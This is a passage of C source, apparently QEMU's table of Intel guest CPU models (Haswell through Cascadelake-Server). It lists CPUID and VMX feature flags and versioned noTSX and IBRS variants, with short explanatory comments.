VMX_SECONDARY_EXEC_ENABLE_VPID | VMX_SECONDARY_EXEC_UNRESTRICTED_GUEST | VMX_SECONDARY_EXEC_APIC_REGISTER_VIRT | VMX_SECONDARY_EXEC_VIRTUAL_INTR_DELIVERY | VMX_SECONDARY_EXEC_RDRAND_EXITING | VMX_SECONDARY_EXEC_ENABLE_INVPCID | VMX_SECONDARY_EXEC_ENABLE_VMFUNC | VMX_SECONDARY_EXEC_SHADOW_VMCS, .features[FEAT_VMX_VMFUNC] = MSR_VMX_VMFUNC_EPT_SWITCHING, .xlevel = 0x80000008, .model_id = "Intel Core Processor (Haswell)", .versions = (X86CPUVersionDefinition[]) { { .version = 1 }, { .version = 2, .alias = "Haswell-noTSX", .props = (PropValue[]) { { "hle", "off" }, { "rtm", "off" }, { "stepping", "1" }, { "model-id", "Intel Core Processor (Haswell, no TSX)", }, { NULL /* end of list */ } }, }, { .version = 3, .alias = "Haswell-IBRS", .props = (PropValue[]) { /* Restore TSX features removed by -v2 above */ { "hle", "on" }, { "rtm", "on" }, /* * Haswell and Haswell-IBRS had stepping=4 in * QEMU 4.0 and older */ { "stepping", "4" }, { "spec-ctrl", "on" }, { "model-id", "Intel Core Processor (Haswell, IBRS)" }, { NULL /* end of list */ } } }, { .version = 4, .alias = "Haswell-noTSX-IBRS", .props = (PropValue[]) { { "hle", "off" }, { "rtm", "off" }, /* spec-ctrl was already enabled by -v3 above */ { "stepping", "1" }, { "model-id", "Intel Core Processor (Haswell, no TSX, IBRS)" }, { NULL /* end of list */ } } }, { 0 /* end of list */ } } }, { .name = "Broadwell", .level = 0xd, .vendor = CPUID_VENDOR_INTEL, .family = 6, .model = 61, .stepping = 2, .features[FEAT_1_EDX] = CPUID_VME | CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | CPUID_DE | CPUID_FP87, .features[FEAT_1_ECX] = CPUID_EXT_AVX | CPUID_EXT_XSAVE | CPUID_EXT_AES | CPUID_EXT_POPCNT | CPUID_EXT_X2APIC | CPUID_EXT_SSE42 | CPUID_EXT_SSE41 | CPUID_EXT_CX16 | CPUID_EXT_SSSE3 | CPUID_EXT_PCLMULQDQ | CPUID_EXT_SSE3 | CPUID_EXT_TSC_DEADLINE_TIMER | CPUID_EXT_FMA | CPUID_EXT_MOVBE | CPUID_EXT_PCID | CPUID_EXT_F16C | CPUID_EXT_RDRAND, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_RDTSCP | CPUID_EXT2_NX | CPUID_EXT2_SYSCALL, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_ABM | CPUID_EXT3_LAHF_LM | CPUID_EXT3_3DNOWPREFETCH, .features[FEAT_7_0_EBX] = CPUID_7_0_EBX_FSGSBASE | CPUID_7_0_EBX_BMI1 | CPUID_7_0_EBX_HLE | CPUID_7_0_EBX_AVX2 | CPUID_7_0_EBX_SMEP | CPUID_7_0_EBX_BMI2 | CPUID_7_0_EBX_ERMS | CPUID_7_0_EBX_INVPCID | CPUID_7_0_EBX_RTM | CPUID_7_0_EBX_RDSEED | 
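/*
 * Context for the -noTSX variants (summary): "hle" and "rtm" are the
 * CPUID.07H:EBX feature bits for Intel TSX. Real Haswell and Broadwell
 * parts shipped with TSX that was later disabled by microcode updates, so
 * the noTSX versions exist to model such hosts and keep migration between
 * them well defined; later -IBRS versions then re-enable or re-disable the
 * pair explicitly, as the props lists around here spell out.
 */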
CPUID_7_0_EBX_ADX | CPUID_7_0_EBX_SMAP, .features[FEAT_XSAVE] = CPUID_XSAVE_XSAVEOPT, .features[FEAT_6_EAX] = CPUID_6_EAX_ARAT, .features[FEAT_VMX_BASIC] = MSR_VMX_BASIC_INS_OUTS | MSR_VMX_BASIC_TRUE_CTLS, .features[FEAT_VMX_ENTRY_CTLS] = VMX_VM_ENTRY_IA32E_MODE | VMX_VM_ENTRY_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_ENTRY_LOAD_IA32_PAT | VMX_VM_ENTRY_LOAD_DEBUG_CONTROLS | VMX_VM_ENTRY_LOAD_IA32_EFER, .features[FEAT_VMX_EPT_VPID_CAPS] = MSR_VMX_EPT_EXECONLY | MSR_VMX_EPT_PAGE_WALK_LENGTH_4 | MSR_VMX_EPT_WB | MSR_VMX_EPT_2MB | MSR_VMX_EPT_1GB | MSR_VMX_EPT_INVEPT | MSR_VMX_EPT_INVEPT_SINGLE_CONTEXT | MSR_VMX_EPT_INVEPT_ALL_CONTEXT | MSR_VMX_EPT_INVVPID | MSR_VMX_EPT_INVVPID_SINGLE_ADDR | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT | MSR_VMX_EPT_INVVPID_ALL_CONTEXT | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT_NOGLOBALS | MSR_VMX_EPT_AD_BITS, .features[FEAT_VMX_EXIT_CTLS] = VMX_VM_EXIT_ACK_INTR_ON_EXIT | VMX_VM_EXIT_SAVE_DEBUG_CONTROLS | VMX_VM_EXIT_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_EXIT_LOAD_IA32_PAT | VMX_VM_EXIT_LOAD_IA32_EFER | VMX_VM_EXIT_SAVE_IA32_PAT | VMX_VM_EXIT_SAVE_IA32_EFER | VMX_VM_EXIT_SAVE_VMX_PREEMPTION_TIMER, .features[FEAT_VMX_MISC] = MSR_VMX_MISC_ACTIVITY_HLT | MSR_VMX_MISC_STORE_LMA | MSR_VMX_MISC_VMWRITE_VMEXIT, .features[FEAT_VMX_PINBASED_CTLS] = VMX_PIN_BASED_EXT_INTR_MASK | VMX_PIN_BASED_NMI_EXITING | VMX_PIN_BASED_VIRTUAL_NMIS | VMX_PIN_BASED_VMX_PREEMPTION_TIMER | VMX_PIN_BASED_POSTED_INTR, .features[FEAT_VMX_PROCBASED_CTLS] = VMX_CPU_BASED_VIRTUAL_INTR_PENDING | VMX_CPU_BASED_USE_TSC_OFFSETING | VMX_CPU_BASED_HLT_EXITING | VMX_CPU_BASED_INVLPG_EXITING | VMX_CPU_BASED_MWAIT_EXITING | VMX_CPU_BASED_RDPMC_EXITING | VMX_CPU_BASED_RDTSC_EXITING | VMX_CPU_BASED_CR8_LOAD_EXITING | VMX_CPU_BASED_CR8_STORE_EXITING | VMX_CPU_BASED_TPR_SHADOW | VMX_CPU_BASED_MOV_DR_EXITING | VMX_CPU_BASED_UNCOND_IO_EXITING | VMX_CPU_BASED_USE_IO_BITMAPS | VMX_CPU_BASED_MONITOR_EXITING | VMX_CPU_BASED_PAUSE_EXITING | VMX_CPU_BASED_VIRTUAL_NMI_PENDING | VMX_CPU_BASED_USE_MSR_BITMAPS | VMX_CPU_BASED_CR3_LOAD_EXITING | VMX_CPU_BASED_CR3_STORE_EXITING | VMX_CPU_BASED_MONITOR_TRAP_FLAG | VMX_CPU_BASED_ACTIVATE_SECONDARY_CONTROLS, .features[FEAT_VMX_SECONDARY_CTLS] = VMX_SECONDARY_EXEC_VIRTUALIZE_APIC_ACCESSES | VMX_SECONDARY_EXEC_WBINVD_EXITING | VMX_SECONDARY_EXEC_ENABLE_EPT | VMX_SECONDARY_EXEC_DESC | VMX_SECONDARY_EXEC_RDTSCP | VMX_SECONDARY_EXEC_VIRTUALIZE_X2APIC_MODE | VMX_SECONDARY_EXEC_ENABLE_VPID | VMX_SECONDARY_EXEC_UNRESTRICTED_GUEST | VMX_SECONDARY_EXEC_APIC_REGISTER_VIRT | VMX_SECONDARY_EXEC_VIRTUAL_INTR_DELIVERY | VMX_SECONDARY_EXEC_RDRAND_EXITING | VMX_SECONDARY_EXEC_ENABLE_INVPCID | VMX_SECONDARY_EXEC_ENABLE_VMFUNC | VMX_SECONDARY_EXEC_SHADOW_VMCS | VMX_SECONDARY_EXEC_RDSEED_EXITING | VMX_SECONDARY_EXEC_ENABLE_PML, .features[FEAT_VMX_VMFUNC] = MSR_VMX_VMFUNC_EPT_SWITCHING, .xlevel = 0x80000008, .model_id = "Intel Core Processor (Broadwell)", .versions = (X86CPUVersionDefinition[]) { { .version = 1 }, { .version = 2, .alias = "Broadwell-noTSX", .props = (PropValue[]) { { "hle", "off" }, { "rtm", "off" }, { "model-id", "Intel Core Processor (Broadwell, no TSX)", }, { NULL /* end of list */ } }, }, { .version = 3, .alias = "Broadwell-IBRS", .props = (PropValue[]) { /* Restore TSX features removed by -v2 above */ { "hle", "on" }, { "rtm", "on" }, { "spec-ctrl", "on" }, { "model-id", "Intel Core Processor (Broadwell, IBRS)" }, { NULL /* end of list */ } } }, { .version = 4, .alias = "Broadwell-noTSX-IBRS", .props = (PropValue[]) { { "hle", "off" }, { "rtm", "off" }, /* spec-ctrl was already enabled by -v3 
above */ { "model-id", "Intel Core Processor (Broadwell, no TSX, IBRS)" }, { NULL /* end of list */ } } }, { 0 /* end of list */ } } }, { .name = "Skylake-Client", .level = 0xd, .vendor = CPUID_VENDOR_INTEL, .family = 6, .model = 94, .stepping = 3, .features[FEAT_1_EDX] = CPUID_VME | CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | CPUID_DE | CPUID_FP87, .features[FEAT_1_ECX] = CPUID_EXT_AVX | CPUID_EXT_XSAVE | CPUID_EXT_AES | CPUID_EXT_POPCNT | CPUID_EXT_X2APIC | CPUID_EXT_SSE42 | CPUID_EXT_SSE41 | CPUID_EXT_CX16 | CPUID_EXT_SSSE3 | CPUID_EXT_PCLMULQDQ | CPUID_EXT_SSE3 | CPUID_EXT_TSC_DEADLINE_TIMER | CPUID_EXT_FMA | CPUID_EXT_MOVBE | CPUID_EXT_PCID | CPUID_EXT_F16C | CPUID_EXT_RDRAND, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_RDTSCP | CPUID_EXT2_NX | CPUID_EXT2_SYSCALL, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_ABM | CPUID_EXT3_LAHF_LM | CPUID_EXT3_3DNOWPREFETCH, .features[FEAT_7_0_EBX] = CPUID_7_0_EBX_FSGSBASE | CPUID_7_0_EBX_BMI1 | CPUID_7_0_EBX_HLE | CPUID_7_0_EBX_AVX2 | CPUID_7_0_EBX_SMEP | CPUID_7_0_EBX_BMI2 | CPUID_7_0_EBX_ERMS | CPUID_7_0_EBX_INVPCID | CPUID_7_0_EBX_RTM | CPUID_7_0_EBX_RDSEED | CPUID_7_0_EBX_ADX | CPUID_7_0_EBX_SMAP, /* Missing: XSAVES (not supported by some Linux versions, * including v4.1 to v4.12). * KVM doesn't yet expose any XSAVES state save component, * and the only one defined in Skylake (processor tracing) * probably will block migration anyway. */ .features[FEAT_XSAVE] = CPUID_XSAVE_XSAVEOPT | CPUID_XSAVE_XSAVEC | CPUID_XSAVE_XGETBV1, .features[FEAT_6_EAX] = CPUID_6_EAX_ARAT, /* Missing: Mode-based execute control (XS/XU), processor tracing, TSC scaling */ .features[FEAT_VMX_BASIC] = MSR_VMX_BASIC_INS_OUTS | MSR_VMX_BASIC_TRUE_CTLS, .features[FEAT_VMX_ENTRY_CTLS] = VMX_VM_ENTRY_IA32E_MODE | VMX_VM_ENTRY_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_ENTRY_LOAD_IA32_PAT | VMX_VM_ENTRY_LOAD_DEBUG_CONTROLS | VMX_VM_ENTRY_LOAD_IA32_EFER, .features[FEAT_VMX_EPT_VPID_CAPS] = MSR_VMX_EPT_EXECONLY | MSR_VMX_EPT_PAGE_WALK_LENGTH_4 | MSR_VMX_EPT_WB | MSR_VMX_EPT_2MB | MSR_VMX_EPT_1GB | MSR_VMX_EPT_INVEPT | MSR_VMX_EPT_INVEPT_SINGLE_CONTEXT | MSR_VMX_EPT_INVEPT_ALL_CONTEXT | MSR_VMX_EPT_INVVPID | MSR_VMX_EPT_INVVPID_SINGLE_ADDR | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT | MSR_VMX_EPT_INVVPID_ALL_CONTEXT | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT_NOGLOBALS | MSR_VMX_EPT_AD_BITS, .features[FEAT_VMX_EXIT_CTLS] = VMX_VM_EXIT_ACK_INTR_ON_EXIT | VMX_VM_EXIT_SAVE_DEBUG_CONTROLS | VMX_VM_EXIT_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_EXIT_LOAD_IA32_PAT | VMX_VM_EXIT_LOAD_IA32_EFER | VMX_VM_EXIT_SAVE_IA32_PAT | VMX_VM_EXIT_SAVE_IA32_EFER | VMX_VM_EXIT_SAVE_VMX_PREEMPTION_TIMER, .features[FEAT_VMX_MISC] = MSR_VMX_MISC_ACTIVITY_HLT | MSR_VMX_MISC_STORE_LMA | MSR_VMX_MISC_VMWRITE_VMEXIT, .features[FEAT_VMX_PINBASED_CTLS] = VMX_PIN_BASED_EXT_INTR_MASK | VMX_PIN_BASED_NMI_EXITING | VMX_PIN_BASED_VIRTUAL_NMIS | VMX_PIN_BASED_VMX_PREEMPTION_TIMER, .features[FEAT_VMX_PROCBASED_CTLS] = VMX_CPU_BASED_VIRTUAL_INTR_PENDING | VMX_CPU_BASED_USE_TSC_OFFSETING | VMX_CPU_BASED_HLT_EXITING | VMX_CPU_BASED_INVLPG_EXITING | VMX_CPU_BASED_MWAIT_EXITING | VMX_CPU_BASED_RDPMC_EXITING | VMX_CPU_BASED_RDTSC_EXITING | VMX_CPU_BASED_CR8_LOAD_EXITING | VMX_CPU_BASED_CR8_STORE_EXITING | VMX_CPU_BASED_TPR_SHADOW | VMX_CPU_BASED_MOV_DR_EXITING | VMX_CPU_BASED_UNCOND_IO_EXITING | VMX_CPU_BASED_USE_IO_BITMAPS | 
VMX_CPU_BASED_MONITOR_EXITING | VMX_CPU_BASED_PAUSE_EXITING | VMX_CPU_BASED_VIRTUAL_NMI_PENDING | VMX_CPU_BASED_USE_MSR_BITMAPS | VMX_CPU_BASED_CR3_LOAD_EXITING | VMX_CPU_BASED_CR3_STORE_EXITING | VMX_CPU_BASED_MONITOR_TRAP_FLAG | VMX_CPU_BASED_ACTIVATE_SECONDARY_CONTROLS, .features[FEAT_VMX_SECONDARY_CTLS] = VMX_SECONDARY_EXEC_VIRTUALIZE_APIC_ACCESSES | VMX_SECONDARY_EXEC_WBINVD_EXITING | VMX_SECONDARY_EXEC_ENABLE_EPT | VMX_SECONDARY_EXEC_DESC | VMX_SECONDARY_EXEC_RDTSCP | VMX_SECONDARY_EXEC_ENABLE_VPID | VMX_SECONDARY_EXEC_UNRESTRICTED_GUEST | VMX_SECONDARY_EXEC_RDRAND_EXITING | VMX_SECONDARY_EXEC_ENABLE_INVPCID | VMX_SECONDARY_EXEC_ENABLE_VMFUNC | VMX_SECONDARY_EXEC_SHADOW_VMCS | VMX_SECONDARY_EXEC_RDSEED_EXITING | VMX_SECONDARY_EXEC_ENABLE_PML, .features[FEAT_VMX_VMFUNC] = MSR_VMX_VMFUNC_EPT_SWITCHING, .xlevel = 0x80000008, .model_id = "Intel Core Processor (Skylake)", .versions = (X86CPUVersionDefinition[]) { { .version = 1 }, { .version = 2, .alias = "Skylake-Client-IBRS", .props = (PropValue[]) { { "spec-ctrl", "on" }, { "model-id", "Intel Core Processor (Skylake, IBRS)" }, { NULL /* end of list */ } } }, { .version = 3, .alias = "Skylake-Client-noTSX-IBRS", .props = (PropValue[]) { { "hle", "off" }, { "rtm", "off" }, { "model-id", "Intel Core Processor (Skylake, IBRS, no TSX)" }, { NULL /* end of list */ } } }, { 0 /* end of list */ } } }, { .name = "Skylake-Server", .level = 0xd, .vendor = CPUID_VENDOR_INTEL, .family = 6, .model = 85, .stepping = 4, .features[FEAT_1_EDX] = CPUID_VME | CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | CPUID_DE | CPUID_FP87, .features[FEAT_1_ECX] = CPUID_EXT_AVX | CPUID_EXT_XSAVE | CPUID_EXT_AES | CPUID_EXT_POPCNT | CPUID_EXT_X2APIC | CPUID_EXT_SSE42 | CPUID_EXT_SSE41 | CPUID_EXT_CX16 | CPUID_EXT_SSSE3 | CPUID_EXT_PCLMULQDQ | CPUID_EXT_SSE3 | CPUID_EXT_TSC_DEADLINE_TIMER | CPUID_EXT_FMA | CPUID_EXT_MOVBE | CPUID_EXT_PCID | CPUID_EXT_F16C | CPUID_EXT_RDRAND, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_PDPE1GB | CPUID_EXT2_RDTSCP | CPUID_EXT2_NX | CPUID_EXT2_SYSCALL, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_ABM | CPUID_EXT3_LAHF_LM | CPUID_EXT3_3DNOWPREFETCH, .features[FEAT_7_0_EBX] = CPUID_7_0_EBX_FSGSBASE | CPUID_7_0_EBX_BMI1 | CPUID_7_0_EBX_HLE | CPUID_7_0_EBX_AVX2 | CPUID_7_0_EBX_SMEP | CPUID_7_0_EBX_BMI2 | CPUID_7_0_EBX_ERMS | CPUID_7_0_EBX_INVPCID | CPUID_7_0_EBX_RTM | CPUID_7_0_EBX_RDSEED | CPUID_7_0_EBX_ADX | CPUID_7_0_EBX_SMAP | CPUID_7_0_EBX_CLWB | CPUID_7_0_EBX_AVX512F | CPUID_7_0_EBX_AVX512DQ | CPUID_7_0_EBX_AVX512BW | CPUID_7_0_EBX_AVX512CD | CPUID_7_0_EBX_AVX512VL | CPUID_7_0_EBX_CLFLUSHOPT, .features[FEAT_7_0_ECX] = CPUID_7_0_ECX_PKU, /* Missing: XSAVES (not supported by some Linux versions, * including v4.1 to v4.12). * KVM doesn't yet expose any XSAVES state save component, * and the only one defined in Skylake (processor tracing) * probably will block migration anyway. 
*/ .features[FEAT_XSAVE] = CPUID_XSAVE_XSAVEOPT | CPUID_XSAVE_XSAVEC | CPUID_XSAVE_XGETBV1, .features[FEAT_6_EAX] = CPUID_6_EAX_ARAT, /* Missing: Mode-based execute control (XS/XU), processor tracing, TSC scaling */ .features[FEAT_VMX_BASIC] = MSR_VMX_BASIC_INS_OUTS | MSR_VMX_BASIC_TRUE_CTLS, .features[FEAT_VMX_ENTRY_CTLS] = VMX_VM_ENTRY_IA32E_MODE | VMX_VM_ENTRY_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_ENTRY_LOAD_IA32_PAT | VMX_VM_ENTRY_LOAD_DEBUG_CONTROLS | VMX_VM_ENTRY_LOAD_IA32_EFER, .features[FEAT_VMX_EPT_VPID_CAPS] = MSR_VMX_EPT_EXECONLY | MSR_VMX_EPT_PAGE_WALK_LENGTH_4 | MSR_VMX_EPT_WB | MSR_VMX_EPT_2MB | MSR_VMX_EPT_1GB | MSR_VMX_EPT_INVEPT | MSR_VMX_EPT_INVEPT_SINGLE_CONTEXT | MSR_VMX_EPT_INVEPT_ALL_CONTEXT | MSR_VMX_EPT_INVVPID | MSR_VMX_EPT_INVVPID_SINGLE_ADDR | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT | MSR_VMX_EPT_INVVPID_ALL_CONTEXT | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT_NOGLOBALS | MSR_VMX_EPT_AD_BITS, .features[FEAT_VMX_EXIT_CTLS] = VMX_VM_EXIT_ACK_INTR_ON_EXIT | VMX_VM_EXIT_SAVE_DEBUG_CONTROLS | VMX_VM_EXIT_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_EXIT_LOAD_IA32_PAT | VMX_VM_EXIT_LOAD_IA32_EFER | VMX_VM_EXIT_SAVE_IA32_PAT | VMX_VM_EXIT_SAVE_IA32_EFER | VMX_VM_EXIT_SAVE_VMX_PREEMPTION_TIMER, .features[FEAT_VMX_MISC] = MSR_VMX_MISC_ACTIVITY_HLT | MSR_VMX_MISC_STORE_LMA | MSR_VMX_MISC_VMWRITE_VMEXIT, .features[FEAT_VMX_PINBASED_CTLS] = VMX_PIN_BASED_EXT_INTR_MASK | VMX_PIN_BASED_NMI_EXITING | VMX_PIN_BASED_VIRTUAL_NMIS | VMX_PIN_BASED_VMX_PREEMPTION_TIMER | VMX_PIN_BASED_POSTED_INTR, .features[FEAT_VMX_PROCBASED_CTLS] = VMX_CPU_BASED_VIRTUAL_INTR_PENDING | VMX_CPU_BASED_USE_TSC_OFFSETING | VMX_CPU_BASED_HLT_EXITING | VMX_CPU_BASED_INVLPG_EXITING | VMX_CPU_BASED_MWAIT_EXITING | VMX_CPU_BASED_RDPMC_EXITING | VMX_CPU_BASED_RDTSC_EXITING | VMX_CPU_BASED_CR8_LOAD_EXITING | VMX_CPU_BASED_CR8_STORE_EXITING | VMX_CPU_BASED_TPR_SHADOW | VMX_CPU_BASED_MOV_DR_EXITING | VMX_CPU_BASED_UNCOND_IO_EXITING | VMX_CPU_BASED_USE_IO_BITMAPS | VMX_CPU_BASED_MONITOR_EXITING | VMX_CPU_BASED_PAUSE_EXITING | VMX_CPU_BASED_VIRTUAL_NMI_PENDING | VMX_CPU_BASED_USE_MSR_BITMAPS | VMX_CPU_BASED_CR3_LOAD_EXITING | VMX_CPU_BASED_CR3_STORE_EXITING | VMX_CPU_BASED_MONITOR_TRAP_FLAG | VMX_CPU_BASED_ACTIVATE_SECONDARY_CONTROLS, .features[FEAT_VMX_SECONDARY_CTLS] = VMX_SECONDARY_EXEC_VIRTUALIZE_APIC_ACCESSES | VMX_SECONDARY_EXEC_WBINVD_EXITING | VMX_SECONDARY_EXEC_ENABLE_EPT | VMX_SECONDARY_EXEC_DESC | VMX_SECONDARY_EXEC_RDTSCP | VMX_SECONDARY_EXEC_VIRTUALIZE_X2APIC_MODE | VMX_SECONDARY_EXEC_ENABLE_VPID | VMX_SECONDARY_EXEC_UNRESTRICTED_GUEST | VMX_SECONDARY_EXEC_APIC_REGISTER_VIRT | VMX_SECONDARY_EXEC_VIRTUAL_INTR_DELIVERY | VMX_SECONDARY_EXEC_RDRAND_EXITING | VMX_SECONDARY_EXEC_ENABLE_INVPCID | VMX_SECONDARY_EXEC_ENABLE_VMFUNC | VMX_SECONDARY_EXEC_SHADOW_VMCS | VMX_SECONDARY_EXEC_RDSEED_EXITING | VMX_SECONDARY_EXEC_ENABLE_PML, .xlevel = 0x80000008, .model_id = "Intel Xeon Processor (Skylake)", .versions = (X86CPUVersionDefinition[]) { { .version = 1 }, { .version = 2, .alias = "Skylake-Server-IBRS", .props = (PropValue[]) { /* clflushopt was not added to Skylake-Server-IBRS */ /* TODO: add -v3 including clflushopt */ { "clflushopt", "off" }, { "spec-ctrl", "on" }, { "model-id", "Intel Xeon Processor (Skylake, IBRS)" }, { NULL /* end of list */ } } }, { .version = 3, .alias = "Skylake-Server-noTSX-IBRS", .props = (PropValue[]) { { "hle", "off" }, { "rtm", "off" }, { "model-id", "Intel Xeon Processor (Skylake, IBRS, no TSX)" }, { NULL /* end of list */ } } }, { 0 /* end of list */ } } }, { .name = "Cascadelake-Server", .level = 
0xd, .vendor = CPUID_VENDOR_INTEL, .family = 6, .model = 85, .stepping = 6, .features[FEAT_1_EDX] = CPUID_VME | CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | CPUID_DE | CPUID_FP87, .features[FEAT_1_ECX] = CPUID_EXT_AVX | CPUID_EXT_XSAVE | CPUID_EXT_AES | CPUID_EXT_POPCNT | CPUID_EXT_X2APIC | CPUID_EXT_SSE42 | CPUID_EXT_SSE41 | CPUID_EXT_CX16 | CPUID_EXT_SSSE3 | CPUID_EXT_PCLMULQDQ | CPUID_EXT_SSE3 | CPUID_EXT_TSC_DEADLINE_TIMER | CPUID_EXT_FMA | CPUID_EXT_MOVBE | CPUID_EXT_PCID | CPUID_EXT_F16C | CPUID_EXT_RDRAND, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_PDPE1GB | CPUID_EXT2_RDTSCP | CPUID_EXT2_NX | CPUID_EXT2_SYSCALL, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_ABM | CPUID_EXT3_LAHF_LM | CPUID_EXT3_3DNOWPREFETCH, .features[FEAT_7_0_EBX] = CPUID_7_0_EBX_FSGSBASE | CPUID_7_0_EBX_BMI1 | CPUID_7_0_EBX_HLE | CPUID_7_0_EBX_AVX2 | CPUID_7_0_EBX_SMEP | CPUID_7_0_EBX_BMI2 | CPUID_7_0_EBX_ERMS | CPUID_7_0_EBX_INVPCID | CPUID_7_0_EBX_RTM | CPUID_7_0_EBX_RDSEED | CPUID_7_0_EBX_ADX | CPUID_7_0_EBX_SMAP | CPUID_7_0_EBX_CLWB | CPUID_7_0_EBX_AVX512F | CPUID_7_0_EBX_AVX512DQ | CPUID_7_0_EBX_AVX512BW | CPUID_7_0_EBX_AVX512CD | CPUID_7_0_EBX_AVX512VL | CPUID_7_0_EBX_CLFLUSHOPT, .features[FEAT_7_0_ECX] = CPUID_7_0_ECX_PKU | CPUID_7_0_ECX_AVX512VNNI, .features[FEAT_7_0_EDX] = CPUID_7_0_EDX_SPEC_CTRL | CPUID_7_0_EDX_SPEC_CTRL_SSBD, /* Missing: XSAVES (not supported by some Linux versions, * including v4.1 to v4.12). * KVM doesn't yet expose any XSAVES state save component, * and the only one defined in Skylake (processor tracing) * probably will block migration anyway. 
*/ .features[FEAT_XSAVE] = CPUID_XSAVE_XSAVEOPT | CPUID_XSAVE_XSAVEC | CPUID_XSAVE_XGETBV1, .features[FEAT_6_EAX] = CPUID_6_EAX_ARAT, /* Missing: Mode-based execute control (XS/XU), processor tracing, TSC scaling */ .features[FEAT_VMX_BASIC] = MSR_VMX_BASIC_INS_OUTS | MSR_VMX_BASIC_TRUE_CTLS, .features[FEAT_VMX_ENTRY_CTLS] = VMX_VM_ENTRY_IA32E_MODE | VMX_VM_ENTRY_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_ENTRY_LOAD_IA32_PAT | VMX_VM_ENTRY_LOAD_DEBUG_CONTROLS | VMX_VM_ENTRY_LOAD_IA32_EFER, .features[FEAT_VMX_EPT_VPID_CAPS] = MSR_VMX_EPT_EXECONLY | MSR_VMX_EPT_PAGE_WALK_LENGTH_4 | MSR_VMX_EPT_WB | MSR_VMX_EPT_2MB | MSR_VMX_EPT_1GB | MSR_VMX_EPT_INVEPT | MSR_VMX_EPT_INVEPT_SINGLE_CONTEXT | MSR_VMX_EPT_INVEPT_ALL_CONTEXT | MSR_VMX_EPT_INVVPID | MSR_VMX_EPT_INVVPID_SINGLE_ADDR | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT | MSR_VMX_EPT_INVVPID_ALL_CONTEXT | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT_NOGLOBALS | MSR_VMX_EPT_AD_BITS, .features[FEAT_VMX_EXIT_CTLS] = VMX_VM_EXIT_ACK_INTR_ON_EXIT | VMX_VM_EXIT_SAVE_DEBUG_CONTROLS | VMX_VM_EXIT_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_EXIT_LOAD_IA32_PAT | VMX_VM_EXIT_LOAD_IA32_EFER | VMX_VM_EXIT_SAVE_IA32_PAT | VMX_VM_EXIT_SAVE_IA32_EFER | VMX_VM_EXIT_SAVE_VMX_PREEMPTION_TIMER, .features[FEAT_VMX_MISC] = MSR_VMX_MISC_ACTIVITY_HLT | MSR_VMX_MISC_STORE_LMA | MSR_VMX_MISC_VMWRITE_VMEXIT, .features[FEAT_VMX_PINBASED_CTLS] = VMX_PIN_BASED_EXT_INTR_MASK | VMX_PIN_BASED_NMI_EXITING | VMX_PIN_BASED_VIRTUAL_NMIS | VMX_PIN_BASED_VMX_PREEMPTION_TIMER | VMX_PIN_BASED_POSTED_INTR, .features[FEAT_VMX_PROCBASED_CTLS] = VMX_CPU_BASED_VIRTUAL_INTR_PENDING | VMX_CPU_BASED_USE_TSC_OFFSETING | VMX_CPU_BASED_HLT_EXITING | VMX_CPU_BASED_INVLPG_EXITING | VMX_CPU_BASED_MWAIT_EXITING | VMX_CPU_BASED_RDPMC_EXITING | VMX_CPU_BASED_RDTSC_EXITING | VMX_CPU_BASED_CR8_LOAD_EXITING | VMX_CPU_BASED_CR8_STORE_EXITING | VMX_CPU_BASED_TPR_SHADOW | VMX_CPU_BASED_MOV_DR_EXITING | VMX_CPU_BASED_UNCOND_IO_EXITING | VMX_CPU_BASED_USE_IO_BITMAPS | VMX_CPU_BASED_MONITOR_EXITING | VMX_CPU_BASED_PAUSE_EXITING | VMX_CPU_BASED_VIRTUAL_NMI_PENDING | VMX_CPU_BASED_USE_MSR_BITMAPS | VMX_CPU_BASED_CR3_LOAD_EXITING | VMX_CPU_BASED_CR3_STORE_EXITING | VMX_CPU_BASED_MONITOR_TRAP_FLAG | 